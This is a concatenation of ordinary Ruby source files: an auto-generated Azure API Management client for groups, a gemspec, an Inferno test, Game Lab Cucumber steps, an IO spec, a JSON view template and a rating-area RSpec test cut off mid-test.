fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupContract.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Creates or Updates a group.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupCreateParameters] Create parameters.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def create_or_update(resource_group_name, service_name, group_id, parameters, custom_headers:nil)
response = create_or_update_async(resource_group_name, service_name, group_id, parameters, custom_headers:custom_headers).value!
nil
end
#
# Creates or Updates a group.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupCreateParameters] Create parameters.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def create_or_update_with_http_info(resource_group_name, service_name, group_id, parameters, custom_headers:nil)
create_or_update_async(resource_group_name, service_name, group_id, parameters, custom_headers:custom_headers).value!
end
#
# Creates or Updates a group.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupCreateParameters] Create parameters.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def create_or_update_async(resource_group_name, service_name, group_id, parameters, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupCreateParameters.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 201 || status_code == 204
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Updates the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupUpdateParameters] Update parameters.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ErrorBodyContract] operation results.
#
def update(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:nil)
response = update_async(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Updates the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupUpdateParameters] Update parameters.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def update_with_http_info(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:nil)
update_async(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:custom_headers).value!
end
#
# Updates the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupUpdateParameters] Update parameters.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def update_async(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, 'if_match is nil' if if_match.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['If-Match'] = if_match unless if_match.nil?
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:patch, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 204 || status_code == 405
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 405
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::ErrorBodyContract.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes specific group of the API Management service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ErrorBodyContract] operation results.
#
def delete(resource_group_name, service_name, group_id, if_match, custom_headers:nil)
response = delete_async(resource_group_name, service_name, group_id, if_match, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Deletes specific group of the API Management service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def delete_with_http_info(resource_group_name, service_name, group_id, if_match, custom_headers:nil)
delete_async(resource_group_name, service_name, group_id, if_match, custom_headers:custom_headers).value!
end
#
# Deletes specific group of the API Management service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def delete_async(resource_group_name, service_name, group_id, if_match, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, 'if_match is nil' if if_match.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['If-Match'] = if_match unless if_match.nil?
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 204 || status_code == 405
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 405
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::ErrorBodyContract.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists a collection of groups defined within a service instance.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [GroupCollection] operation results.
#
def list_by_service_next(next_page_link, custom_headers:nil)
response = list_by_service_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists a collection of groups defined within a service instance.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_service_next_with_http_info(next_page_link, custom_headers:nil)
list_by_service_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Lists a collection of groups defined within a service instance.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_service_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupCollection.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field | Supported operators | Supported
# functions |
# |-------------|------------------------|---------------------------------------------|
# | id | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | name | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | type | eq, ne | N/A
# |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [GroupCollection] which provide lazy access to pages of the response.
#
def list_by_service_as_lazy(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
response = list_by_service_async(resource_group_name, service_name, filter:filter, top:top, skip:skip, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_service_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 52.53877 | 233 | 0.683173 |
791acc286127dca2fd5e29d6b61416aa71e2c8b5 | 1,609 | # -*- encoding: utf-8 -*-
# stub: terminal-table 2.0.0 ruby lib
Gem::Specification.new do |s|
s.name = "terminal-table".freeze
s.version = "2.0.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["TJ Holowaychuk".freeze, "Scott J. Goldman".freeze]
s.date = "2020-11-01"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/tj/terminal-table".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.2.32".freeze
s.summary = "Simple, feature rich ascii table generation library".freeze
s.installed_by_version = "3.2.32" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<bundler>.freeze, ["~> 2"])
s.add_development_dependency(%q<rake>.freeze, ["~> 13.0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 3.0"])
s.add_development_dependency(%q<term-ansicolor>.freeze, [">= 0"])
s.add_development_dependency(%q<pry>.freeze, [">= 0"])
s.add_runtime_dependency(%q<unicode-display_width>.freeze, ["~> 1.1", ">= 1.1.1"])
else
s.add_dependency(%q<bundler>.freeze, ["~> 2"])
s.add_dependency(%q<rake>.freeze, ["~> 13.0"])
s.add_dependency(%q<rspec>.freeze, [">= 3.0"])
s.add_dependency(%q<term-ansicolor>.freeze, [">= 0"])
s.add_dependency(%q<pry>.freeze, [">= 0"])
s.add_dependency(%q<unicode-display_width>.freeze, ["~> 1.1", ">= 1.1.1"])
end
end
| 40.225 | 112 | 0.666874 |
ff9f4e36929e85460769fb32159918a0cc9e85df | 391 | shared_context :run_in_temp_directory do
require 'tmpdir'
around do |spec|
current_dir = Dir.pwd
Dir.mktmpdir do |path|
Dir.chdir(path)
spec.call
Dir.chdir(current_dir)
end
end
def write_to_file(path, content, mode: nil)
FileUtils.mkdir_p(File.dirname(path))
File.write(path, content)
File.chmod(mode.to_i, path) if mode
path
end
end
| 20.578947 | 45 | 0.672634 |
ff0470258955b329dd2559e07591fd3253303081 | 1,163 | present entry do |entry_presenter|
json.extract! entry, :id, :feed_id, :title, :author, :summary
json.content entry_presenter.api_content
json.url entry.fully_qualified_url
json.published entry.published.iso8601(6)
json.created_at entry.created_at.iso8601(6)
json.original entry.original
json.twitter_id entry.twitter_id
json.twitter_thread_ids entry.twitter_thread_ids
json.images do
if entry.processed_image?
json.original_url entry.image["original_url"]
json.size_1 do
json.cdn_url entry.processed_image
json.width entry.image["width"]
json.height entry.image["height"]
end
else
json.null!
end
end
json.enclosure do
if entry_presenter.has_enclosure?
json.enclosure_url entry_presenter.enclosure_url
json.enclosure_type entry.data["enclosure_type"]
json.enclosure_length entry.data["enclosure_length"]
json.itunes_duration entry.data["itunes_duration"]
json.itunes_image entry.data["itunes_image"]
else
json.null!
end
end
json.extracted_articles entry_presenter.extracted_articles do |article|
json.merge! article
end
end | 32.305556 | 73 | 0.736887 |
1879c4de8da61792e4f82639702c2bba435b50e1 | 548 | # frozen_string_literal: true
require File.expand_path '../test_helper.rb', __dir__
class HomePageTest < MiniTest::Test
include Rack::Test::Methods
def app
Inferno::App.new
end
def test_front_page_responds
get '/'
assert last_response.ok?
assert last_response.body.downcase.include? 'html'
end
def test_no_x_frame_options_header
get '/'
refute_includes last_response.headers.keys.map(&:downcase), 'x-frame-options'
end
def test_404_page
get '/asdfasdf'
assert last_response.not_found?
end
end
| 20.296296 | 81 | 0.728102 |
797589e12d629f213252aed9b59239ada9f5d498 | 3,696 | # Gamelab-specific cucumber step definitions
# Which stage of allthethings.script contains the gamelab levels; this way we
# only have to update in one place if this changes.
GAMELAB_ALLTHETHINGS_STAGE = 19
Given /^I start a new Game ?Lab project$/ do
steps <<-STEPS
And I am on "http://studio.code.org/projects/gamelab/new"
And I rotate to landscape
And I wait for the page to fully load
STEPS
end
Given /^I am on the (\d+)(?:st|nd|rd|th)? Game ?Lab test level$/ do |level_index|
steps <<-STEPS
And I am on "http://studio.code.org/s/allthethings/stage/#{GAMELAB_ALLTHETHINGS_STAGE}/puzzle/#{level_index}"
And I rotate to landscape
And I wait for the page to fully load
STEPS
end
When /^I (?:run the game|press run)$/ do
# Use a short wait to surface any errors that occur during the first few frames
steps <<-STEPS
And I press "runButton"
And I wait for 2 seconds
STEPS
end
When /^I (?:reset the game|press reset)$/ do
steps 'And I press "resetButton"'
end
When /^I switch to(?: the)? animation (?:mode|tab)$/ do
steps 'When I press "animationMode"'
end
When /^I switch to(?: the)? code (?:mode|tab) in Game Lab$/ do
@browser.execute_script("$(\"#codeMode\")[0].click();")
end
Then /^I do not see "([^"]*)" in the Game Lab console$/ do |message|
expect(element_contains_text?('#debug-output', message)).to be false
end
Then /^I see (\d+) animations in the animation column$/ do |num_animations|
expect(@browser.execute_script('return $(".animationList>div>div").not(".newListItem").length')).to eq num_animations.to_i
end
Then /^I open the animation picker$/ do
@browser.execute_script("$(\".newListItem\")[0].click();")
end
Then /^I select a blank animation$/ do
@browser.execute_script("$(\".uitest-animation-picker-item\")[0].click();")
end
Then /^I select the animal category of the animation library$/ do
wait_until {@browser.execute_script("return $(\"img[src*='/category_animals.png']\").length != 0;")}
@browser.execute_script("$(\"img[src*='/category_animals.png']\")[1].click();")
end
Then /^I select the bear animal head animation from the animal category$/ do
wait_until {@browser.execute_script("return $(\"img[src*='/category_animals/animalhead_bear.png']\").length != 0;")}
@browser.execute_script("$(\"img[src*='/category_animals/animalhead_bear.png']\")[0].click();")
end
Then /^I add a new, blank animation$/ do
steps <<-STEPS
And I open the animation picker
And I select a blank animation
STEPS
end
Then /^I add the bear animal head animation from the library$/ do
steps <<-STEPS
And I open the animation picker
And I select the animal category of the animation library
And I select the bear animal head animation from the animal category
STEPS
end
Then /^I append gamelab code to draw a ninja$/ do
code = <<CODE.gsub(/\n/, '\\n')
function draw() {
noStroke();
// Feet
fill('black');
ellipse(190, 350, 30, 30);
ellipse(210, 350, 30, 30);
// Hands
fill('black');
ellipse(145, 310, 30, 30);
ellipse(260, 300, 30, 30);
// Body
fill('white');
ellipse(200, 300, 110, 110);
fill('black');
ellipse(200, 300, 100, 100);
// Head
fill('white');
ellipse(200, 180, 210, 210);
fill('black');
ellipse(200, 180, 200, 200);
fill('white');
rect(0, 170, 400, 50);
fill('black');
ellipse(150, 195, 30, 40);
ellipse(250, 195, 30, 40);
fill('white');
ellipse(155, 190, 6, 8);
ellipse(255, 190, 6, 8);
}
CODE
script = <<SCRIPT
var aceEditor = __TestInterface.getDroplet().aceEditor;
aceEditor.navigateFileEnd();
aceEditor.textInput.focus();
aceEditor.onTextInput(\"#{code}\");
SCRIPT
@browser.execute_script(script)
end
| 28.430769 | 124 | 0.676948 |
01364a3a6ba8532facd2d007eb048eb7100381df | 1,032 | # encoding: utf-8
require File.dirname(__FILE__) + '/../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
ruby_version_is '1.8.7' do
describe "IO#bytes" do
before :each do
@original = $KCODE
$KCODE = "UTF-8"
@io = File.open(IOSpecs.gets_fixtures)
end
after :each do
@io.close unless @io.closed?
$KCODE = @original
end
it "returns an enumerator of the next bytes from the stream" do
enum = @io.bytes
enum.should be_kind_of(enumerator_class)
@io.readline.should == "Voici la ligne une.\n"
enum.first(5).should == [81, 117, 105, 32, 195]
end
it "ignores a block" do
@io.bytes{ raise "oups" }.should be_kind_of(enumerator_class)
end
it "raises IOError on closed stream" do
enum = IOSpecs.closed_file.bytes
lambda { enum.first }.should raise_error(IOError)
enum = @io.bytes
enum.first.should == 86
@io.close
lambda { enum.first }.should raise_error(IOError)
end
end
end
| 26.461538 | 67 | 0.630814 |
386c45426796899ff46b465482c6c9ffc0323f22 | 4,569 | require 'rails_helper'
module BenefitMarkets
RSpec.describe Locations::RatingArea do
describe "given nothing" do
before :each do
subject.valid?
end
it "requires an active year" do
expect(subject.errors.has_key?(:active_year)).to be_truthy
end
it "requires an exchange provided code" do
expect(subject.errors.has_key?(:exchange_provided_code)).to be_truthy
end
it "requires a geographic boundry to be specified" do
expect(subject.errors[:base]).to include("a location covered by the rating area must be specified")
end
end
describe "which covers the entire administrative area" do
subject { Locations::RatingArea.new(covered_states: ["MA"]) }
before :each do
subject.valid?
end
it "is satisfied location has been provided" do
expect(subject.errors[:base]).not_to include("a location covered by the rating area must be specified")
end
end
describe "given a county zip pair" do
subject { Locations::RatingArea.new(county_zip_ids: [BSON::ObjectId.new]) }
before :each do
subject.valid?
end
it "is satisfied location has been provided" do
expect(subject.errors[:base]).not_to include("a location covered by the rating area must be specified")
end
end
describe "created for a given zip code and county in a state", :dbclean => :after_each do
let(:county_zip) { ::BenefitMarkets::Locations::CountyZip.create!(county_name: "Hampshire", zip: "01001", state: "MA") }
let(:rating_area) { ::BenefitMarkets::Locations::RatingArea.create!(active_year: TimeKeeper.date_of_record.year, county_zip_ids: [county_zip.id], exchange_provided_code: "MA0") }
let(:address_outside_county) {
OpenStruct.new(
:zip => "01001",
:county => "Baltimore",
:state => "MA"
)
}
let(:address_outside_zip) {
OpenStruct.new(
:zip => "01555",
:county => "Hampshire",
:state => "MA"
)
}
let(:address_outside_state) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MD"
)
}
let(:matching_address) {
OpenStruct.new(
:zip => "01001",
:county => "Hampshire",
:state => "MA"
)
}
it "will not be found when given an address not in that county" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_county)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "will not be found when given an address not in that zip code" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_zip)
expect(rating_areas.to_a).not_to include(rating_area)
end
it "will not be found when given an address not in that state" do
rating_area
rating_areas = ::BenefitMarkets::Locations::RatingArea.rating_area_for(address_outside_state)
